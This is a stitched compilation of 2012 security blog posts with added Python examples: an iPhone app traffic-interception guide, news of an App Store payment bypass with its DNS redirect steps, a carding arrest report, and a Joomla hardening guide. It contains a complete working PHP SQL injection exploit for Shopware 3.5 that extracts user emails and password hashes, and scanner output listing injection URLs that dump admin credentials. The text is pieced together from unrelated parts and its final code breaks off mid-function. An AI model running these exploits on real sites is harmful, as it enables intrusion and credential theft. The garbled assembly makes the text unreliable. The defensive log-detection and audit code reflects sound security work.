Now browsing any http website or http application on the iPhone routes the traffic to your workstation and it will be displayed in Burp Suite. The same proxy settings also work for https traffic. But capturing iPhone application https traffic is a little tricky. In SSL communication, browser based applications automatically validate the server-side certificate; whereas in native iOS applications, the developer has to explicitly write the code to validate server certificates. Coding mistakes at this point may lead the application to accept any server certificate. When an application fails to validate the server certificate, attackers can use any fake certificate and perform MITM attacks. One common mistake that we see in iPhone application development is the use of the allowsAnyHTTPSCertificateForHost (NSURLRequest) or continueWithoutCredentialForAuthenticationChallenge (NSURLConnection) function call. Applications which implement these functions accept any certificate even if it is not issued by the original server. Also the application users do not even get a certificate warning. While pentesting, check whether the application is validating the certificates properly or not. If the application validates server-side certificates properly, then it will display a certificate error message when it receives an invalid certificate. It also does not allow the user to use that application or proceed further with the invalid certificate.

To capture the SSL traffic of these applications during pen testing, first we have to add a proxy CA certificate to the iPhone trusted certificates list. Later, if the application receives a proxy certificate it will not display any certificate error because we told our iPhone to trust that certificate. This will allow us to capture the https traffic. The same technique is applicable to other protocols which work on certificates. The video below demonstrates the MITM of https application traffic.

Apart from the http and https protocols, iPhone applications may also use custom protocols or low level socket communication APIs (NSStreams, CFStreams). The MITM techniques explained above would not work to capture the network traffic of these applications. In order to capture the low level traffic of these applications, download and install tcpdump from Cydia on the iPhone. Upon installation of tcpdump, connect to the iPhone over SSH and run the commands below to capture traffic and write it into a .pcap file.
> ssh root@iPhone-IP
> password: alpine

Connect to the phone using a GUI SSH client like Cyberduck. Browse to the folders and copy the recently created .pcap file to your workstation. Next, open the .pcap file using a traffic capture tool like Wireshark. Use your protocol analyzing skills and identify the custom protocol. The same techniques can be used for the applications which do not respect the iPhone proxy settings. In these cases, DNS spoofing techniques can be used to perform MITM and for traffic capture. Once you capture the traffic, typical web application pen testing attacks are done on the application server. Now you can look for SQL injection, authentication, authorization, session management, cryptography weaknesses and many more web related vulnerabilities.

Penetration Testing iPhone Applications is going to be covered in a series of articles. Part 2 will cover privacy issues and local data storage.

References: InfoSec Resources
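A first pass over the .pcap copied off the phone, as an added example that is not part of the article above: it parses the classic pcap container with only the standard library and labels each TCP flow as cleartext HTTP, TLS, or "other" (the custom-protocol case the article sends to Wireshark). The capture is constructed inline from three hand-built frames; the addresses and payloads are made up.

```python
"""Triage a tcpdump capture: which TCP flows are cleartext HTTP, TLS, or something custom."""
import struct

# --- constructed sample capture (Ethernet II + IPv4 + TCP, checksums left at zero) ---

def tcp_frame(src_ip, dst_ip, sport, dport, payload):
    """Build one Ethernet/IPv4/TCP frame carrying `payload` (constructed test data, not real traffic)."""
    eth = b'\x00' * 12 + b'\x08\x00'                      # dst MAC, src MAC, EtherType IPv4
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split('.')),
                     bytes(int(o) for o in dst_ip.split('.')))
    tcp = struct.pack('!HHIIBBHHH', sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)  # PSH+ACK
    return eth + ip + tcp + payload

def build_pcap(frames):
    """Wrap frames in a classic little-endian pcap (LINKTYPE_ETHERNET = 1), as tcpdump -w writes it."""
    out = struct.pack('<IHHiIII', 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack('<IIII', i, 0, len(frame), len(frame)) + frame
    return out

PHONE, SERVER = '192.168.1.10', '203.0.113.5'   # constructed addresses (server in the RFC 5737 test range)
SAMPLE_PCAP = build_pcap([
    tcp_frame(PHONE, SERVER, 50001, 80,
              b'POST /api/login HTTP/1.1\r\nHost: app.example\r\n\r\nuser=alice&pass=hunter2'),
    tcp_frame(PHONE, SERVER, 50002, 443, b'\x16\x03\x01\x00\x40\x01\x00\x00\x3c\x03\x03' + b'\x00' * 32),
    tcp_frame(PHONE, SERVER, 50003, 9000, b'\x01\x00\x00\x0bPING alice\x00'),
])

# --- parsing ---

def iter_frames(pcap):
    """Yield raw link-layer frames from a classic pcap; rejects pcapng and non-Ethernet captures."""
    magic, = struct.unpack('<I', pcap[:4])
    endian = {0xA1B2C3D4: '<', 0xD4C3B2A1: '>'}.get(magic)
    if endian is None:
        raise ValueError('not a classic pcap file (pcapng is not handled here)')
    linktype, = struct.unpack(endian + 'I', pcap[20:24])
    if linktype != 1:
        raise ValueError('only Ethernet captures are handled here')
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(endian + 'IIII', pcap[off:off + 16])[2]
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len

def tcp_payload(frame):
    """Return (src, sport, dst, dport, payload) for an IPv4/TCP frame, or None for anything else."""
    if len(frame) < 34 or frame[12:14] != b'\x08\x00':
        return None
    ihl = (frame[14] & 0x0F) * 4
    total = struct.unpack('!H', frame[16:18])[0]
    ip = frame[14:14 + total]                            # drops Ethernet padding, if any
    if ip[9] != 6:                                       # protocol 6 = TCP
        return None
    src = '.'.join(str(b) for b in ip[12:16])
    dst = '.'.join(str(b) for b in ip[16:20])
    tcp = ip[ihl:]
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack('!HH', tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return src, sport, dst, dport, tcp[data_off:]

HTTP_STARTS = (b'GET ', b'POST ', b'PUT ', b'HEAD ', b'DELETE ', b'OPTIONS ', b'HTTP/1.')

def classify(payload):
    """Label a TCP payload by what its first bytes look like."""
    if not payload:
        return 'empty'
    if payload.startswith(HTTP_STARTS):
        return 'http-cleartext'                          # readable on the wire: the MITM/FireSheep case
    if len(payload) >= 3 and 0x14 <= payload[0] <= 0x17 and payload[1] == 0x03:
        return 'tls'                                     # TLS record header; needs the proxy CA trick to read
    return 'other'                                       # custom protocol / raw stream: open it in Wireshark

def classify_capture(pcap):
    """Map each (src, sport, dst, dport) flow to the label of its first non-empty payload."""
    flows = {}
    for frame in iter_frames(pcap):
        parsed = tcp_payload(frame)
        if parsed is None or not parsed[4]:
            continue
        flows.setdefault(parsed[:4], classify(parsed[4]))
    return flows

def cleartext_flows(flows):
    """Flows that carried application data in the clear: the ones to report first."""
    return sorted(f for f, kind in flows.items() if kind == 'http-cleartext')

if __name__ == '__main__':
    for (src, sport, dst, dport), kind in classify_capture(SAMPLE_PCAP).items():
        print(f'{src}:{sport} -> {dst}:{dport}  {kind}')
```

Replace SAMPLE_PCAP with the bytes of the real capture file to run it on a phone's traffic.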
-
App Store bypassed by Russian hacker without jailbreaking Posted On 7/15/2012 08:30:00 AM By THN Security Analyst

Apple is investigating yet another security breach in its iTunes App Store. A Russian hacker worked out a way that allows people to bypass payment in the App Store and download products for free. The hacker, dubbed ZonD80, posted a video of the crack on YouTube (deleted by YouTube now) and claims that the technique makes it possible to beat Apple's payment systems by installing a couple of certificates and assigning a specific IP address to the device. The new service, which has already been subject to attempts at shutting it down, requires no jailbreaking and only minimal configuration changes. It works by funneling purchase requests through a server operated by the hacker, rather than the legitimate one offered by Apple. As a result, charges that normally would be applied to a user's account are bypassed.

Below are the steps to the hack:
1. Install two certificates: CA and in-appstore.com.
2. Connect via a Wi-Fi network and change the DNS to 62.76.189.117.
3. Press the Like button and enter your Apple ID & password.

Using the above hack, you are actually stealing in-app purchase content from developers, which is kind of disturbing and is of course against the developer's terms of service. ZonD80 is now asking for donations to set up a website to promote the hack. "Why you must to pay for content, already included in purchased app? I think, you must not," he said.

Apple has responded with the following statement: "The security of the App Store is incredibly important to us and the developer community," said Apple representative Natalie Harrison. "We take reports of fraudulent activity very seriously and we are investigating." http://thehackernews.com/2012/07/app-store-bypassed-by-russian-hacker.html
-
Hacker wanted by FBI held in India For Carding Crimes Posted On 7/15/2012 06:35:00 AM By THN Security Analyst

Nikhil Kolbekar, aka HellsAngel, was arrested on July 11 in Mumbai, India. Eric Bogle, known as Swat Runs Train, and Justin Mills, or xTGxKAKAROT, were taken into custody in Canada and Colorado, US, respectively. HellsAngel and Bogle are suspected of selling complete credit card details, including names, addresses, social security numbers, birth dates, and bank account information. He also sold remote desktop protocol (RDP) access data that could be utilized to breach computers in countries such as Turkey, India, Czech Republic, Brazil, Germany, France, Italy, Spain, Sweden, and others. The suspect, Nikhil Kolbekar, was produced before the Esplanade Court on Thursday and has been remanded in judicial custody. He will be produced before the Patiala House court in Delhi on July 25, with the US pressing for his extradition through Interpol.

Carding refers to various criminal activities associated with stealing personal identification information and financial information belonging to other individuals, including the account information associated with credit cards, bank cards, debit cards, or other access devices, and using that information to obtain money, goods, or services without the victims' authorization or consent.

Janice K. Fedarcyk, the assistant director in charge of the New York FBI, said the cross-border law-enforcement operation is targeting "highly organized cyber criminals" and is designed to "root out criminal behavior on the Internet." FBI Assistant Director in-Charge Janice K. Fedarcyk said, "These arrests in India, Canada, and the United States as part of Operation Card Shop are just another example that cyber criminals will be stopped even if they cross borders.
Operation Card Shop is an international operation aimed at sophisticated, highly organized cyber criminals involved in buying and selling stolen identities, exploited credit cards, counterfeit documents, and sophisticated hacking tools. The FBI and all our law enforcement partners, here and abroad, will continue to root out criminal behavior on the Internet.” The police have seized a computer, hard-disk, CPU, CDs and pen-drives from Kolbekar, which will be used as evidence against him. http://thehackernews.com/2012/07/hacker-wanted-by-fbi-held-in-india-for.html
-
#!/usr/bin/php
<?php
# Exploit Title: Shopware 3.5 - SQL Injection
# Date: 13.07.2012
# Exploit Author: Kataklysmos
# Software Link: http://www.shopware.de/
# Version: 3.5

function http_req($host, $q) {
    if(!$fs = fsockopen($host, 80))
        exit("Could not open HTTP-Connection to ".$host."\r\n\r\n");
    $head = "GET /recommendation/bought/article/".urlencode("0 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (".$q.") FROM `information_schema`.`tables` LIMIT 0,1), FLOOR(RAND(0)*2)) x FROM `information_schema`.`tables` GROUP BY x) z)")." HTTP/1.1\r\n";
    $head .= "Host: ".$host."\r\n";
    $head .= "Connection: Close\r\n\r\n";
    fwrite($fs, $head);
    $ret = '';
    while(!feof($fs)) $ret .= fgets($fs, 4096);
    fclose($fs);
    return $ret;
}

function mask($cont) {
    if(preg_match('/Duplicate entry \'(.*)1\' for/', $cont, $m)) return $m[1];
    else return false;
}

function space($x) {
    $r = '';
    for($i = 0; $i < $x; $i++) $r .= ' ';
    return $r;
}

echo "\r\nExploit Title: Shopware 3.5 - SQL Injection\r\n";
echo "Date: 13.07.2012\r\n";
echo "Exploit Author: Kataklysmos\r\n";
echo "Software Link: http://www.shopware.de/\r\n";
echo "Version: 3.5\r\n\r\n";

if(!isset($argv[2])) {
    echo " Usage: \r\n";
    echo " ".$argv[0]." HOST --auto\r\n";
    echo " ".$argv[0]." www.shopwaredemo.de --auto\r\n\r\n";
    echo " ".$argv[0]." HOST QUERY\r\n";
    echo " ".$argv[0]." www.shopwaredemo.de \"SELECT COUNT(`id`) FROM `s_user`\"\r\n";
    echo " ".$argv[0]." www.shopwaredemo.de \"SELECT `email` FROM `s_user` LIMIT 0,1\"\r\n\r\n";
    exit(1);
}

if($argv[2] != '--auto') {
    $x = http_req($argv[1], $argv[2]);
    if(!$x = mask($x)) exit("Your query failed!\r\n\r\n");
    echo "Query:\r\n ".$argv[2]."\r\nReturn:\r\n ".$x."\r\n\r\n";
} else {
    $task = array(
        array('Amount of registered users', 'SELECT COUNT(`id`) FROM `s_user`', null),
        array('E-Mail from first user', 'SELECT `email` FROM `s_user` ORDER BY `id` LIMIT 0,1', null),
        array('Password from first user', 'SELECT `password` FROM `s_user` LIMIT 0,1', null),
        array('Amount of orders', 'SELECT COUNT(`id`) FROM `s_order`', null)
    );
    for($i = 0; $i < count($task); $i++) {
        echo "[ .. ] Task: \"".$task[$i][0]."\"";
        $x = http_req($argv[1], $task[$i][1]);
        if(!$x = mask($x)) echo "\r[fail] Task: \"".$task[$i][0]."\"\r\n";
        else {
            echo "\r[ ok ] Task: \"".$task[$i][0]."\"\r\n";
            $task[$i][2] = $x;
        }
    }
    echo "\r\n";
    for($i = 0; $i < count($task); $i++)
        echo $task[$i][0].space(26-strlen($task[$i][0])).' : '.$task[$i][2]."\r\n";
    echo "\r\n";
}
?>
# 1337day.com [2012-07-14] http://1337day.com/
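From the defender's side, this is what the script's requests look like in a web server's access log and how to pick them out. Added example, not part of the posted script: it decodes the request path the way PHP's urlencode() encoded it, checks that the article id on that route is numeric, and looks for the COUNT/GROUP BY/FLOOR(RAND(0)*2) construct the script relies on to trigger a "Duplicate entry" error. The log lines are constructed; the route string is the one the script requests.

```python
"""Flag requests to the Shopware route used above in web-server access logs."""
import re
from urllib.parse import quote_plus, unquote_plus

# Combined-format prefix: ip ident user [ts] "METHOD path PROTO" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
ROUTE = '/recommendation/bought/article/'              # endpoint the script hits; expects a numeric id
SQL_WORDS = re.compile(r'\b(?:select|union|concat|information_schema|group\s+by)\b', re.I)
# The FLOOR(RAND(0)*2) + GROUP BY construct that forces the duplicate-key error the script parses.
DUP_ENTRY_SIG = re.compile(r'floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)', re.I)


def inspect_line(line):
    """Return None for a normal request to the route, else (ip, decoded_path, reasons)."""
    m = LOG_RE.match(line)
    if not m or not m.group('path').startswith(ROUTE):
        return None
    decoded = unquote_plus(m.group('path'))             # PHP urlencode() turns spaces into '+'
    article_id = decoded[len(ROUTE):].split('?', 1)[0]
    if article_id.isdigit():
        return None
    reasons = ['non-numeric article id']
    if SQL_WORDS.search(decoded):
        reasons.append('SQL keywords in path')
    if DUP_ENTRY_SIG.search(decoded):
        reasons.append('error-based (duplicate entry) injection signature')
    if m.group('status') == '500':
        reasons.append('server answered 500, the error text may have leaked')
    return m.group('ip'), decoded, '; '.join(reasons)


def scan_log(lines):
    """All suspicious hits in a list of access-log lines."""
    return [hit for hit in map(inspect_line, lines) if hit]


# Constructed log lines; the second path is encoded the way the script above encodes its request.
INJECTED = ('0 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT 1), FLOOR(RAND(0)*2)) x '
            'FROM information_schema.tables GROUP BY x) z)')
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Jul/2012:10:01:02 +0000] "GET /recommendation/bought/article/42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [13/Jul/2012:10:01:05 +0000] "GET ' + ROUTE + quote_plus(INJECTED) + ' HTTP/1.1" 500 812',
    '203.0.113.9 - - [13/Jul/2012:10:01:09 +0000] "GET /recommendation/bought/article/42abc HTTP/1.1" 404 210',
]

if __name__ == '__main__':
    for ip, path, why in scan_log(SAMPLE_LOG):
        print(ip, path[:60], '->', why)
```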
-
I think you all know how to create a blog using a free or paid CMS. However, keeping a blog secure is not an easy job, given that hackers generally have far broader knowledge than most bloggers or site owners. The security of a blog is fairly important, because it reflects the quality of your business. A hacker can attack your site, and the information obtained can then be used for purposes more or less good, which will tarnish your image. There are plenty of methods used to "break" a website, and OWASP (Open Web Application Security Project) has classified the most dangerous methods and vulnerabilities. In any case, there are many ways to prevent this on various platforms, which is what I want to present in this topic.

Joomla is an open source CMS, easy to install and use. As expected, many bloggers and site owners use Joomla. Maybe you have used Joomla before, maybe not, but now I think you are wondering how a website that uses Joomla can be secured. In this topic I will present vulnerability scanning for Joomla, how to fix the vulnerabilities, and how to implement the best security for Joomla.

Scanning Joomla for vulnerabilities

Vulnerability scanning is the first step in determining how secure the web application is. The result gives you some useful information about how things stand, security-wise, on your blog or website. There are tools made specifically for scanning Joomla. We can use an ordinary scanner, but we increase the chances of success by also taking a look at the result of a scanner built specifically for Joomla.

The OWASP Joomla vulnerability scanner

Groosman, as the script is called, is written in Perl and is used to scan a Joomla website; the tool comes from the OWASP Joomla security project. "OWASP Joomla! Vulnerability Scanner v..." has some interesting features:
- Scans for and detects the Joomla version
- Can discover known Joomla vulnerabilities
- Can detect a firewall or anti-scanning barriers, etc.

You can find the tool on BackTrack 5 R2 under Applications > BackTrack > Vulnerability Assessment > Web Application Assessment > CMS Vulnerability Identification > joomscan, or:
root@bt: cd /pentest/web/joomscan

A short example of a scan would look something like this:

Vulnerabilities Discovered
==========================
# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? N/A

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? N/A

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? N/A

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? N/A

# 6
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? N/A

# 7
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? N/A

# 8
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? N/A

# 9
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? N/A

# 10
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? N/A

# 11
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? N/A

# 12
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? N/A

# 13
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 14
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 15
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 16
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 17
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? N/A

# 18
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? N/A

# 19
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? N/A

# 20
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year to /index.php?option=com_content&view=archive
Vulnerable? No

# 21
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? N/A

# 22
Info -> CoreComponent: com_users XSS Vulnerability
Version Affected: Joomla! 1.5.10 <=
Check: /components/com_users/
Exploit: A XSS vulnerability exists in the user view of com_users in the administrator panel.
Vulnerable? N/A

# 23
Info -> CoreComponent: com_installer CSRF Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /administrator/components/com_installer/
Exploit: N/A
Vulnerable? N/A

# 24
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 25
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? No

# 26
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? N/A

I didn't find much; well, I didn't pick my target well either. I did it to show you roughly what the scan result looks like. At the end of the scan it gives you the "verdict":

There are 1337 vulnerable points in 39 found entries!
~[*] Time Taken: 56 sec
~[*] Send bugs, suggestions, contributions to joomscan@yehg.net

CMS Explorer

CMS Explorer was created to "explore" a CMS, detecting its modules, plugins and components. CMS Explorer can be used as a vulnerability scanning tool, because it has an option to search OSVDB (Open Source Vulnerability Database) for known vulnerabilities of the CMS. It can scan several CMSs, including Joomla. All you need in order to use the CMS Explorer script is an OSVDB API key. To get one:
1. Go to the OSVDB website and create an account.
2. Activate your account from the link they send you by e-mail (you know the drill), then log in.
3. Go to the OSVDB API page to get an API key.
4. Find the directory where you saved CMS Explorer earlier, then create a new file. Name it "osvdb.key".
5. Put your API key in osvdb.key and save it.

CMS Explorer is now ready to scan. To enter CMS Explorer:
root@bt: cd /pentest/enumeration/web/cms-explorer

To start a simple scan,

Well, I didn't wait for it to scan everything; as I said, I didn't find my target today. In any case, our objective is not to find the components, so let's focus on our target's vulnerabilities. To do that, we need the OSVDB key. I won't scan again; to do it:
root@bt:/pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://joomlaurl/Joomla -type joomla -osvdb

You can interpret the result yourselves.

Installing securely

The first and most important step in creating a secure Joomla-based website/blog is to choose the right platform (the web server) and to use the best installation methods. If your wallet can take it and you really want something better for security, then a shared-hosting platform is not the best idea, because on such platforms websites share the same server. That presents a risk. So, if you can afford it, get a dedicated server or a VPS. When choosing your hosting company, make sure you read other users' opinions. You will get an idea of how effective the company is. Make sure the hosting company uses up-to-date software.

The next step is to get Joomla and install it on the server. Some web hosting companies and forums provide a script that lets you install the famous CMS in just a few clicks. That is the easiest way to install Joomla. But from a security point of view it is not recommended. It is best to download Joomla from the official site (not from other sites), then upload it to the web server via FTP. Create a MySQL database for the Joomla installation and make sure you choose a good password for the database. NOT "root, toor, db, password, pass, 123, 1234, parola". After that the installation is fairly simple, just follow the procedure. Still, take care with the following:
- Never use the default username, "admin".
- Never use the default table prefix, which is jos_.
- Don't forget to delete the Joomla installation directory after it has been installed successfully.
- Always protect your important files and directories. For example, the Joomla admin panel and configuration.php, which contain vital information about the database. Use htaccess and some good extensions to improve security.

Securing Joomla using .htaccess

.htaccess is a configuration file of web servers that use Apache. It is very powerful and can control the server. htaccess is a hidden file that should already be present in your server's root directory. If not, you can create it, but make sure its name is ".htaccess" (yes, it starts with a "dot"). It can protect the administrative area using different techniques. For example, you can restrict that area based on IP address (this assumes you create a .htaccess file in the "administrator" directory):

order deny,allow
allow from 92.55.65.43
deny from all

Note: if your ISP uses dynamic IPs, it is not a good idea to use this technique, given that your IP may change at some point.

To prevent "directory listing", you can use the following code in the .htaccess file present in your root:

IndexIgnore *
Options -Indexes

Another good method is to disable the server signature, because it gives an idea of the web server software and its version. To do that, use this in .htaccess:

ServerSignature Off

Another important step is to secure the .htaccess file so that nobody can read it in the browser. To do that, you need to add the following:

<Files .htaccess>
order allow,deny
deny from all
</Files>

Configuration.php is a very important file because it contains information about a website's database, and other relevant information. So you also need to secure the configuration.php file using .htaccess:

<FilesMatch "configuration.php">
Order allow,deny
Deny from all
</FilesMatch>

Given that there are plenty of risks associated with the configuration.php file, what we did above is not enough. For maximum security, you will need to move the configuration.php file outside public_html. How? Well, first of all, this was tested on Joomla 1.5.
1. The first step is to create a home directory (outside public_html). Let's assume we named it wubi.
2. Enter the "wubi" folder.
3. Upload the configuration.php file there.
4. Open the Joomla file includes/defines.php and replace the line define('JPATH_CONFIGURATION', JPATH_ROOT); with: define('JPATH_CONFIGURATION', JPATH_ROOT.DS.'../wubi'); If Joomla is in a subdirectory, replace it with: define('JPATH_CONFIGURATION', JPATH_ROOT.DS.'../../'.DS.'wubi'); (watch the syntax). Remember, wubi is the name of the folder created in step 1. You can change it to whatever name you want.
5. Repeat this in administrator/includes/defines.php.

Now the site is ready and secured.

Conclusion

Even though the internet is not a very safe place, you need to take a personal interest in your website's security. So if you are going to use, or already use, the Joomla platform, make sure you implement the best practices available if you want to stay safe.

References: InfoSec Resources, BackTrack-Linux, OWASP, OSVDB
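A way to check whether an installation actually went through the checklist above, as an added example that is not part of the post: it audits a Joomla web root for the steps the post lists (htaccess.txt renamed, installation/ removed, the four .htaccess rules, a restricted administrator/ directory, configuration.php moved out of the web root with both defines.php files updated, and a non-default table prefix). Two constructed trees, one default and one hardened, are written to a temporary directory; the "wubi" sibling directory and the j7k2_ prefix are made up.

```python
"""Audit a Joomla web root against the hardening checklist from the post above."""
import os
import re
import tempfile

# (finding, pattern that must appear in the web-root .htaccess for the step to count as done)
ROOT_HTACCESS_RULES = [
    ('directory listing not disabled (Options -Indexes)', r'^\s*Options\s+-Indexes'),
    ('ServerSignature not turned off', r'^\s*ServerSignature\s+Off'),
    ('.htaccess itself not protected from browsers', r'<Files\s+\.htaccess>.*?deny\s+from\s+all.*?</Files>'),
    ('configuration.php not protected by FilesMatch',
     r'<FilesMatch\s+"configuration\.php">.*?deny\s+from\s+all.*?</FilesMatch>'),
]
DEFINES_FILES = ('includes/defines.php', 'administrator/includes/defines.php')


def _read(path):
    """Text of a file, or '' when it is missing."""
    try:
        with open(path, encoding='utf-8', errors='replace') as fh:
            return fh.read()
    except OSError:
        return ''


def audit(webroot, config_path=None):
    """Return the checklist items this tree has NOT applied; config_path points at a moved configuration.php."""
    findings = []
    root_ht = _read(os.path.join(webroot, '.htaccess'))
    if os.path.exists(os.path.join(webroot, 'htaccess.txt')) and not root_ht:
        findings.append('htaccess.txt not renamed to .htaccess')
    if os.path.isdir(os.path.join(webroot, 'installation')):
        findings.append('installation/ directory still present')
    for finding, pattern in ROOT_HTACCESS_RULES:
        if not re.search(pattern, root_ht, re.M | re.S | re.I):
            findings.append(finding)
    admin_ht = _read(os.path.join(webroot, 'administrator', '.htaccess'))
    if not re.search(r'^\s*deny\s+from\s+all', admin_ht, re.M | re.I):
        findings.append('administrator/ not restricted by its own .htaccess')
    if os.path.exists(os.path.join(webroot, 'configuration.php')):
        findings.append('configuration.php still inside the web root')
    for rel in DEFINES_FILES:
        if re.search(r"JPATH_CONFIGURATION'\s*,\s*JPATH_ROOT\s*\)", _read(os.path.join(webroot, rel))):
            findings.append(rel + ' still loads configuration.php from the web root')
    config = _read(config_path or os.path.join(webroot, 'configuration.php'))
    if re.search(r"\$dbprefix\s*=\s*'jos_'", config):
        findings.append('default table prefix jos_ in use')
    return findings


def make_sample_tree(hardened):
    """Write a constructed Joomla-like tree under a temp dir; returns (webroot, moved configuration.php or None)."""
    base = tempfile.mkdtemp()

    def put(rel, text):
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w', encoding='utf-8') as fh:
            fh.write(text)

    if hardened:
        put('public_html/.htaccess',
            'IndexIgnore *\nOptions -Indexes\nServerSignature Off\n'
            '<Files .htaccess>\norder allow,deny\ndeny from all\n</Files>\n'
            '<FilesMatch "configuration.php">\nOrder allow,deny\nDeny from all\n</FilesMatch>\n')
        put('public_html/administrator/.htaccess', 'order deny,allow\nallow from 192.0.2.10\ndeny from all\n')
        put('wubi/configuration.php', "<?php\nclass JConfig {\n  var $dbprefix = 'j7k2_';\n}\n")
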